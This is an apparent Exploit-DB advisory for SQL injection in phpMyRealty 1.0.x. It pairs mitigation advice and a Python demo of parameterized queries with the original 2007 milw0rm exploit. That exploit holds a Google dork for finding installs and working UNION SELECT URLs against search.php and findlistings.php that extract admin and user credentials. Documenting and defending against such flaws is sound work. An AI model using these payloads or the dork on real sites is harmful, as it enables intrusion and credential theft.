Vendor: phpMyRealty
By: Koller
CVSS: N/A
CWE: 89 (SQL Injection)
Product Name: phpMyRealty
Affected Version From: 1.0
Affected Version To: 1.0.x
Patch Exists: NO
Related CWE:
CPE: a:phpmyrealty:phpmyrealty:1.0
Metasploit:
Other Scripts:
Platforms Tested:
Date: 2007

phpMyRealty 1.0.x

phpMyRealty 1.0.x is vulnerable to SQL Injection. An attacker can exploit it by injecting SQL through the 'type' parameter of search.php and the 'listing_updated_days' parameter of findlistings.php, which allows sensitive information such as login credentials to be retrieved from the pmr_admins and pmr_users tables.

Mitigation:

To mitigate this vulnerability, validate user input before it is used in a SQL query. In addition, use prepared statements or parameterized queries so that user-supplied values are bound as data and can never be interpreted as part of the SQL statement.
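The mitigation above as an added example, not phpMyRealty's own code (which is PHP, where the same fix is a PDO or mysqli prepared statement): a toy SQLite database with the vulnerable string-built query for the 'type' parameter next to a validated, parameterized version. The pmr_listings table, its rows and the admin row are constructed for this demonstration.

```python
import sqlite3

# Constructed toy schema: pmr_admins is named in the advisory,
# pmr_listings and all rows are assumed for the demonstration.
SCHEMA = """
CREATE TABLE pmr_listings (id INTEGER, type INTEGER, title TEXT);
CREATE TABLE pmr_admins (login TEXT, password TEXT);
INSERT INTO pmr_listings VALUES (1, 1, 'House'), (2, 2, 'Condo');
INSERT INTO pmr_admins VALUES ('admin', 'constructed-secret');
"""

# Same shape as the advisory's search.php payload; SQLite's || stands in
# for MySQL's concat_ws(char(58), ...) here.
UNION_PAYLOAD = "-1 UNION SELECT login || ':' || password FROM pmr_admins"


def new_db():
    """In-memory database seeded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_unsafe(conn, type_param):
    """Vulnerable pattern: the request value is spliced into the SQL text,
    so a value shaped like '-1 UNION SELECT ...' rewrites the query."""
    sql = f"SELECT title FROM pmr_listings WHERE type = {type_param}"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, type_param):
    """Hardened pattern: validate the expected type, then bind the value as
    a parameter so the driver never interprets it as SQL."""
    try:
        type_id = int(type_param)   # 'type' and 'listing_updated_days' are numeric
    except (TypeError, ValueError):
        return []                   # reject anything that is not a plain integer
    sql = "SELECT title FROM pmr_listings WHERE type = ?"
    return [row[0] for row in conn.execute(sql, (type_id,))]


if __name__ == "__main__":
    db = new_db()
    print("unsafe:", search_unsafe(db, UNION_PAYLOAD))   # leaks the admin row
    print("safe:  ", search_safe(db, UNION_PAYLOAD))     # []
```

The integer check also covers the findlistings.php case, where the injected value starts with a closing parenthesis and is rejected before any query is built.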

Exploit-DB raw data:

# xaker.name & grabberz.com
#
#    .__                                          __.   
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)   
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)   
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)   
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)   
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)   
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)   
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)   
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)   
#    NN)                                          NN)  
#    .__           http://xaker.name              __.
#
#
# script name      : phpMyRealty 1.0.x
# GoogLe Dork      : Powered by phpMyRealty
# Script demo      : www.phpmyrealty.com/demo/index.php
# The price        : $99.95
# Risk             : Average
# Found By         : Koller
# Thanks           : | robo9 | rijy | Concord | Helkern | Constantine | -St1ff- | .dot | @$_terr_X | b3 |
# Vulnerable files : search.php, findlistings.php

# Vuln : www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins
#        www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_users
#
# Admin panel: www.victim.com/admin/index.php
#
# Addon :) - sql-injection in findlistings.php
# www.victim.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* 

# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-18]